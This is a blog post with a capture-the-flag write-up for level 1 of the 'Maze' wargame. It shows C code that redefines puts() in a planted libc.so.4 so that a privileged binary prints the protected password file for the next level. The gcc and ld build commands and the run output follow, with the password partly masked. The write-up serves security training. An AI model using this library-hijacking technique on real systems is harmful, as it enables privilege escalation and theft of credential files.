maze1@maze:~$ /maze/maze1 /maze/maze1: error while loading shared libraries: ./libc.so.4: cannot open shared object file: No such file or directory
It seems that the executable is linked to a missing library.
If we disasassemble the code we see that the executable does only one thing: it calls a puts() function.
It looks very similar to Utumno Level 2.
In that case the solution was to read memory address by redefining a puts() function and using a format string to show memory content.
If we apply the same solution, it doesn't work because the password is not stored in memory.
So let's try to read the password file and print its content to standard output.
Redefine the puts() function with the following code:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 | #define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <stdint.h> #include <dlfcn.h> int puts(const char *s) { char ch; FILE *fp; fp = fopen("/etc/maze_pass/maze2", "r"); // read mode printf("The %s pass file are:\n",s); while((ch = fgetc(fp)) != EOF) printf("%c", ch); fclose(fp); return 0; } |
Let's compile, link and run the maze1 executable:
maze1@maze:/tmp/maz1$ gcc -m32 -fPIC -c puts.c -o libc.o maze1@maze:/tmp/maz1$ ld -shared -m elf_i386 -o libc.so.4 libc.o -ldl maze1@maze:/tmp/maz1$ /maze/maze1 The Hello World! pass file are: f*******r
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.